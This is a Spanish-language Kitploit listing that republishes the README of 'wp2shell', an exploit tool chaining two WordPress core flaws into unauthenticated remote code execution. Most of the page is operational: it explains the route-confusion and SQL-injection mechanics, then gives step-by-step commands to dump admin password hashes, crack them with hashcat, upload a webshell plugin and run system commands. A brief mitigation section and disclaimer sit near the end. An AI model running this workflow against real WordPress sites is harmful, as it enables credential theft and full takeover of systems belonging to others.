Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
wp2shell-Wordpress-TOWN — Ejecución remota de código no autenticada (RCE) en el núcleo de WordPress permite a los atacantes ejecutar código arbitrario sin iniciar sesión encadenando CVE-2026-63030 y CVE-2026-60137, lo que potencialmente lleva a un compromiso total del sitio. | Kitploit
Herramientas/GitHubGitHub/lucifer0xf/wp2shell-wordpress-town
Escáneres de VulnerabilidadesAnálisis de CódigoExplotaciónSeguridad WebCTFAprendizaje y Educación
GitHublucifer0xf/wp2shell-wordpress-town

wp2shell-Wordpress-TOWN

Ejecución remota de código no autenticada (RCE) en el núcleo de WordPress permite a los atacantes ejecutar código arbitrario sin iniciar sesión encadenando CVE-2026-63030 y CVE-2026-60137, lo que potencialmente lleva a un compromiso total del sitio.

Ver Repositorio
2110hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

wp2shell por : lucifer0xf

Banner

Ejecución remota de código no autenticada para WordPress Core POC (CVE-2026-63030 + CVE-2026-60137)

wp2shell es un exploit para una cadena de vulnerabilidades críticas en el núcleo de WordPress. Encadena un error de confusión de ruta por lotes de la API REST con una inyección SQL en WP_Query para lograr ejecución remota de código no autenticada en instalaciones de WordPress vulnerables.

DetalleInformación
CVEsCVE-2026-63030 (REST batch route confusion) + CVE-2026-60137 (author__not_in SQLi)
AfectadoWordPress 6.9.0 – 6.9.4, 7.0.0 – 7.0.1
Parcheado6.9.5, 7.0.2
Autenticación requeridaNinguna — no autenticado
CVSSCrítica (cadena de RCE)
Descubierto porAdam Kues (Assetnote / Searchlight Cyber)
DependenciasPython 3.8+ — solo biblioteca estándar

Cómo funciona

El exploit encadena dos errores en el núcleo de WordPress:

  1. CVE-2026-60137 — Inyección SQL – Cuando author__not_in se pasa como una cadena en lugar de un array, WordPress omite la protección de sanitización is_array() e interpola el valor crudo en una cláusula SQL NOT IN (...).

  2. CVE-2026-63030 — Confusión de ruta por lotes – El endpoint /wp-json/batch/v1 construye arrays paralelos $matches y $validation. Una sub-solicitud malformada se añade a $validation pero no a $matches, causando un desplazamiento de índice de +1. La sub-solicitud i se envía con el controlador de la sub-solicitud i+1.

Encadenados: Una solicitud POST /wp/v2/posts que lleva una solicitud interna GET /wp/v2/users con una cadena author_exclude elude tanto la lista blanca de métodos como la sanitización de entrada. La cadena llega a WP_Query como author__not_in y se interpola en SQL — otorgándole inyección SQL ciega no autenticada.

A partir de ahí, la herramienta puede:

  • Extraer el hash de la contraseña del administrador
  • Autenticarse como administrador (una vez que el hash sea descifrado)
  • Subir un plugin malicioso
  • Ejecutar comandos arbitrarios del sistema

Características

CaracterísticaDescripción
Verificación de vulnerabilidadSonda de retardo temporal segura — no lee datos, no cambia nada
Extracción de datosInyección SQL ciega con optimización de búsqueda binaria para extracción eficiente
Volcado de hashes de usuariosExtrae los hashes de user_login y user_pass de wp_users
Ejecución remota de códigoAutenticarse como admin, subir un plugin webshell, ejecutar comandos
Shell interactivaSesión persistente de ejecución de comandos
Salida coloreadaRetroalimentación visual clara para resultados de escaneo
Sin dependenciasUsa solo la biblioteca estándar de Python

Instalación

root@kitploit:~
git clone https://github.com/lucifer0xf/wp2shell-Wordpress-TOWN.git
cd wp2shell-Wordpress-TOWN
chmod +x wp2shell.py

Eso es todo. No se requieren paquetes de terceros.


Uso

root@kitploit:~
./wp2shell.py <url> [command] [options]

Modo interactivo (basado en menú)

root@kitploit:~
./wp2shell.py http://target.com

Lanza un menú interactivo con toda la funcionalidad disponible mediante opciones numeradas.

Comandos

check — Confirmar vulnerabilidad (seguro)

Realiza una sonda de retardo temporal para confirmar explotabilidad. No lee datos y no cambia nada.

root@kitploit:~
./wp2shell.py http://target.com check

read — Extraer datos (inyección SQL ciega)

Extrae información de la base de datos mediante inyección SQL ciega basada en tiempo.

root@kitploit:~
# Server fingerprint (version, database, user)
./wp2shell.py http://target.com read

# Extract user logins and password hashes
./wp2shell.py http://target.com read --users

# Extract database name
./wp2shell.py http://target.com read --database

# Extract MySQL version
./wp2shell.py http://target.com read --version

# Custom SQL query
./wp2shell.py http://target.com read --query "SELECT @@version"

shell — Ejecución remota de código

Requiere credenciales de administrador válidas. La inyección SQL puede recuperar el hash de la contraseña, pero debe proporcionar la contraseña en texto plano recuperada.

root@kitploit:~
# Execute a single command
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd "id"

# Execute a single command (short form)
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd whoami

Opciones

OpciónDescripción
--usersExtrae user_login y user_pass de wp_users
--databaseExtrae el nombre de la base de datos actual
--versionExtrae la versión de MySQL
--query "SQL"Ejecuta una consulta SQL personalizada (extracción ciega)
--user USUARIONombre de usuario administrador para RCE
--password CONTRASEÑAContraseña del administrador para RCE (texto plano, recuperada mediante SQLi)
--cmd COMANDOComando a ejecutar a través del webshell

Flujo de trabajo de ejemplo

root@kitploit:~
# 1. Verificar si el objetivo es vulnerable
./wp2shell.py https://example.com check

# 2. Extraer hashes de contraseñas de administradores
./wp2shell.py https://example.com read --users

# 3. Descifrar el hash offline (usando hashcat, john, etc.)
# hashcat -m 400 <hash> /path/to/wordlist.txt

# 4. Ejecutar un comando con la contraseña recuperada
./wp2shell.py https://example.com shell --user admin --password 'cracked_pass' --cmd "id"

Versiones afectadas

RamaAfectadoParcheado
6.9.x6.9.0 – 6.9.46.9.5
7.0.x7.0.0 – 7.0.17.0.2
6.8.x6.8.0 – 6.8.5 (solo SQLi, sin RCE)6.8.6

Las versiones anteriores a 6.9.0 no están afectadas por la cadena completa de RCE.


Detección y Mitigación

Para defensores:

  • Actualizar a 6.9.5, 7.0.2 o posterior inmediatamente
  • Los clientes de Cloudflare WAF están protegidos automáticamente
  • Los clientes de Wordfence tienen reglas de firewall
  • Monitorear solicitudes POST /wp-json/batch/v1 con cuerpos requests anidados
  • Un 404 en la ruta por lotes no siempre significa "parcheado" — también puede significar que un WAF/CDN está bloqueando el acceso anónimo a la API REST

Aviso legal

Esta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas.


Créditos

  • Descubrimiento: Adam Kues (Assetnote / Searchlight Cyber)
  • CVE-2026-60137 (SQLi): TF1T, dtro, haongo
  • CVE-2026-63030 (Confusión de ruta por lotes): Adam Kues
Descargar herramienta